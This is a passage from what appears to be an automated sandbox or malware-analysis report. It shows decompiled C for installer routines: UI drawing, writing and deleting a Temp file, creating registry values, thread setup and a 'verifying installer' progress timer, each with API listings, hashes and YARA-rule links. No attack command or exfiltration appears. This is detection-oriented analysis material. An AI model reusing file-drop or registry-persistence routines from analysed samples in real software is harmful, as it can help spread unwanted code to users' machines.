					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                  0x00403ecd
                                                  0x00403f61
                                                  0x00000000
                                                  0x00403f61
                                                  0x00403ede
                                                  0x00403ee2
                                                  0x00000000
                                                  0x00000000
                                                  0x00403ee8
                                                  0x00403ef1
                                                  0x00403ef4
                                                  0x00403ef4
                                                  0x00403efa
                                                  0x00403f00
                                                  0x00403f00
                                                  0x00403f0c
                                                  0x00403f12
                                                  0x00403f19
                                                  0x00403f1c
                                                  0x00403f1f
                                                  0x00403f21
                                                  0x00403f21
                                                  0x00403f29
                                                  0x00403f2f
                                                  0x00403f2f
                                                  0x00403f39
                                                  0x00403f3e
                                                  0x00403f41
                                                  0x00403f46
                                                  0x00403f49
                                                  0x00403f49
                                                  0x00403f59
                                                  0x00403f59
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                  • Instruction ID: 51638b03811fbd3f25a4eb1d810876b9f584da0c3187da66c7daa715c1b02470
                                                  • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                  • Instruction Fuzzy Hash: 08218471904745ABCB219F78DD08B4BBFF8AF05715B048629F856E22E0D734E904CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E004056F8(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E00405850(_t52);
				_t27 = E0040586F(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423f54; // 0x2fa00
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030B3(_t47);
						E00403081(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E00405830( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                  0x004026af
                                                  0x004026b1
                                                  0x004026bd
                                                  0x004026c0
                                                  0x004026ca
                                                  0x004026ce
                                                  0x004026ce
                                                  0x004026d4
                                                  0x004026e1
                                                  0x004026e9
                                                  0x004026ec
                                                  0x004026f2
                                                  0x00402700
                                                  0x00402705
                                                  0x00402709
                                                  0x0040270c
                                                  0x00402715
                                                  0x00402721
                                                  0x00402725
                                                  0x00402728
                                                  0x00402732
                                                  0x00402751
                                                  0x00402739
                                                  0x0040273e
                                                  0x00402746
                                                  0x00402749
                                                  0x0040274e
                                                  0x0040274e
                                                  0x00402758
                                                  0x00402758
                                                  0x0040276a
                                                  0x00402771
                                                  0x00402783
                                                  0x00402783
                                                  0x00402789
                                                  0x00402789
                                                  0x00402794
                                                  0x00402795
                                                  0x00402799
                                                  0x0040279d
                                                  0x004027a3
                                                  0x004027a3
                                                  0x004027aa
                                                  0x00402197
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,0002FA00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                  • GlobalFree.KERNEL32 ref: 00402758
                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                                  • GlobalFree.KERNEL32 ref: 00402771
                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                  • String ID:
                                                  • API String ID: 3294113728-0
                                                  • Opcode ID: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                                  • Instruction ID: c2c7835655fcdbd4aa1197060f7bd229eae72b48ff88aadc8082708ad166979d
                                                  • Opcode Fuzzy Hash: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                                  • Instruction Fuzzy Hash: 9A31AD71C00128BBCF216FA5DE88DAEBA79EF04364F14423AF924762E0C67949418B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404E84, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00404E84(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423724; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423ff4; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BBA(0, _t39, 0x41fd10, 0x41fd10, _a4);
					}
					_t26 = lstrlenA(0x41fd10);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423708, 0x41fd10);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fd10;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fd10)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fd10, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                  0x00404e8a
                                                  0x00404e96
                                                  0x00404e99
                                                  0x00404e9f
                                                  0x00404eab
                                                  0x00404eae
                                                  0x00404eb1
                                                  0x00404eb7
                                                  0x00404eb7
                                                  0x00404ebd
                                                  0x00404ec5
                                                  0x00404ec8
                                                  0x00404ee5
                                                  0x00404ee9
                                                  0x00404ef2
                                                  0x00404ef2
                                                  0x00404efc
                                                  0x00404f05
                                                  0x00404f11
                                                  0x00404f18
                                                  0x00404f1c
                                                  0x00404f1f
                                                  0x00404f32
                                                  0x00404f40
                                                  0x00404f40
                                                  0x00404f44
                                                  0x00404f46
                                                  0x00404f49
                                                  0x00000000
                                                  0x00404f49
                                                  0x00404eca
                                                  0x00404ed2
                                                  0x00404eda
                                                  0x00404ee0
                                                  0x00000000
                                                  0x00404ee0
                                                  0x00404eda
                                                  0x00404ec8
                                                  0x00404f53

                                                  APIs
                                                  • lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                  • lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                  • lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                  • SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                                  • Instruction ID: 29716f0e6f05b21b32fe67f81276caf5577c11483a64657c7043e00463a136c9
                                                  • Opcode Fuzzy Hash: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                                  • Instruction Fuzzy Hash: 21218EB1900118BBDF119FA5DC849DFBFB9FB44354F10807AF904A6290C7789E418BA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404753, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00404753(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                  0x00404761
                                                  0x0040476e
                                                  0x00404774
                                                  0x004047b2
                                                  0x004047b2
                                                  0x004047c1
                                                  0x004047c8
                                                  0x00000000
                                                  0x004047ca
                                                  0x00404776
                                                  0x00404785
                                                  0x0040478d
                                                  0x00404790
                                                  0x004047a2
                                                  0x004047a8
                                                  0x004047af
                                                  0x00000000
                                                  0x004047af
                                                  0x00000000

                                                  APIs
                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040476E
                                                  • GetMessagePos.USER32 ref: 00404776
                                                  • ScreenToClient.USER32 ref: 00404790
                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 004047A2
                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                  • Instruction ID: b5292072505f589c3e6e61736795eac3e8b5c463abbfbac9e5f2f3c06e421abf
                                                  • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                  • Instruction Fuzzy Hash: BE015275D00219BADB00DB94DC45BFEBBBCAB55715F10412BBB10B71C1C7B465418BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1000CBC6, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 91%
                                                  			E1000CBC6(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E10008856(_t3);
				if(E1000A02A() != 0) {
					_t6 = E10009BAB(E1000C9A8);
					 *0x1001bf00 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E1000A3C9(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E1000CC3C();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E10009C07( *0x1001bf00, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E1000CB13(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E1000CC3C();
					return 0;
				}
			}








                                                  0x1000cbc6
                                                  0x1000cbd2
                                                  0x1000cbe1
                                                  0x1000cbe6
                                                  0x1000cbec
                                                  0x1000cbef
                                                  0x00000000
                                                  0x1000cbf1
                                                  0x1000cbfe
                                                  0x1000cc02
                                                  0x1000cc04
                                                  0x1000cc33
                                                  0x1000cc33
                                                  0x1000cc38
                                                  0x1000cc3b
                                                  0x1000cc06
                                                  0x1000cc14
                                                  0x1000cc16
                                                  0x00000000
                                                  0x1000cc18
                                                  0x1000cc18
                                                  0x1000cc1a
                                                  0x1000cc1b
                                                  0x1000cc22
                                                  0x1000cc28
                                                  0x1000cc2c
                                                  0x1000cc30
                                                  0x1000cc32
                                                  0x1000cc32
                                                  0x1000cc16
                                                  0x1000cc04
                                                  0x1000cbd4
                                                  0x1000cbd4
                                                  0x1000cbd4
                                                  0x1000cbdb
                                                  0x1000cbdb

                                                  APIs
                                                  • __init_pointers.LIBCMT ref: 1000CBC6
                                                    • Part of subcall function 10008856: RtlEncodePointer.NTDLL(00000000,00000001,1000CBCB,10012881,10019298,00000008,10012A49,?,00000001,?,100192B8,0000000C,10012B19,?,00000001,?), ref: 10008859
                                                    • Part of subcall function 10008856: __initp_misc_winsig.LIBCMT ref: 10008874
                                                    • Part of subcall function 10008856: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 10009C6C
                                                    • Part of subcall function 10008856: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 10009C80
                                                    • Part of subcall function 10008856: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10009C93
                                                    • Part of subcall function 10008856: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10009CA6
                                                    • Part of subcall function 10008856: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10009CB9
                                                    • Part of subcall function 10008856: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 10009CCC
                                                    • Part of subcall function 10008856: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 10009CDF
                                                    • Part of subcall function 10008856: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 10009CF2
                                                    • Part of subcall function 10008856: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 10009D05
                                                    • Part of subcall function 10008856: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 10009D18
                                                    • Part of subcall function 10008856: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 10009D2B
                                                    • Part of subcall function 10008856: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 10009D3E
                                                    • Part of subcall function 10008856: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 10009D51
                                                    • Part of subcall function 10008856: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 10009D64
                                                    • Part of subcall function 10008856: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 10009D77
                                                    • Part of subcall function 10008856: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 10009D8A
                                                  • __mtinitlocks.LIBCMT ref: 1000CBCB
                                                  • __mtterm.LIBCMT ref: 1000CBD4
                                                  • __calloc_crt.LIBCMT ref: 1000CBF9
                                                  • __initptd.LIBCMT ref: 1000CC1B
                                                  • GetCurrentThreadId.KERNEL32 ref: 1000CC22
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: AddressProc$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                  • String ID:
                                                  • API String ID: 1593083391-0
                                                  • Opcode ID: e77b311074b1372823cf64468c080a3f38ec66baf9163db7af1a139d05c62488
                                                  • Instruction ID: 5ff50b6daef45d8cf350020376d26c448a7f6c43feb1d9a059d71e5def1a0750
                                                  • Opcode Fuzzy Hash: e77b311074b1372823cf64468c080a3f38ec66baf9163db7af1a139d05c62488
                                                  • Instruction Fuzzy Hash: 19F09036618B6919F224E774BC03E8A3AC4DF017F0F218629F465E50EEFF21E6428651
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402B6E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40b0d8; // 0x2fa00
					_t11 =  *0x41f0e8;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                  0x00402b7b
                                                  0x00402b89
                                                  0x00402b8f
                                                  0x00402b8f
                                                  0x00402b9d
                                                  0x00402b9f
                                                  0x00402ba5
                                                  0x00402bac
                                                  0x00402bae
                                                  0x00402bae
                                                  0x00402bc4
                                                  0x00402bd4
                                                  0x00402be6
                                                  0x00402be6
                                                  0x00402bee

                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                                  • MulDiv.KERNEL32(0002FA00,00000064,?), ref: 00402BB4
                                                  • wsprintfA.USER32 ref: 00402BC4
                                                  • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                                  • SetDlgItemTextA.USER32 ref: 00402BE6
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00402BBE
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                                  • Instruction ID: c6984150c403b35497dc18a40ce28a5dc8b104db4e9527dfc76b44ca96ff41d6
                                                  • Opcode Fuzzy Hash: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                                  • Instruction Fuzzy Hash: 5D01FF70A44208BBEB209F60DD49EEE3769FB04345F008039FA06A92D1D7B5AA558F99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10001100, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 286COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • setting window to 0x%X, xrefs: 1000134D
                                                  • E8 transform detected; file size %u, xrefs: 1000142A
                                                  • decoding stream of size %u to size %u, starting at %u, xrefs: 1000115F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID: E8 transform detected; file size %u$decoding stream of size %u to size %u, starting at %u$setting window to 0x%X
                                                  • API String ID: 0-4286174769
                                                  • Opcode ID: 347821c0b590c84ff46a00d1acb6a352d551c073a430cad62b225cf9ebc3db1c
                                                  • Instruction ID: 0ef6f0d4c798b6b5cdeee44c49291acd8ab441444e0b3c79813df2acd34cb9b1
                                                  • Opcode Fuzzy Hash: 347821c0b590c84ff46a00d1acb6a352d551c073a430cad62b225cf9ebc3db1c
                                                  • Instruction Fuzzy Hash: 52E19FB4904209DFDB04CFA8D590AEEBBF1FF48344F208529E849A7345D775A985CFA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402336, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				_t30 =  *0x423ff0; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a410) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a410 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a410, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a410, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423fc8 =  *0x423fc8 +  *(_t37 - 4);
				return 0;
			}











                                                  0x00402337
                                                  0x0040233c
                                                  0x00402346
                                                  0x00402350
                                                  0x00402353
                                                  0x0040235d
                                                  0x0040236d
                                                  0x00402374
                                                  0x0040237c
                                                  0x0040238a
                                                  0x0040238e
                                                  0x00402399
                                                  0x00402399
                                                  0x0040239d
                                                  0x004023a1
                                                  0x004023a7
                                                  0x004023ac
                                                  0x004023ac
                                                  0x004023b0
                                                  0x004023bc
                                                  0x004023bc
                                                  0x004023d5
                                                  0x004023d7
                                                  0x004023d7
                                                  0x004023da
                                                  0x004024b0
                                                  0x004024b0
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp1E48.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                                  • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsp1E48.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsp1E48.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CloseCreateValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsp1E48.tmp
                                                  • API String ID: 1356686001-4228845472
                                                  • Opcode ID: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                                  • Instruction ID: e6eb4e552242eddf296ff96e6d07a7eb6613d299afeb9756830ee7ce8f9eb162
                                                  • Opcode Fuzzy Hash: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
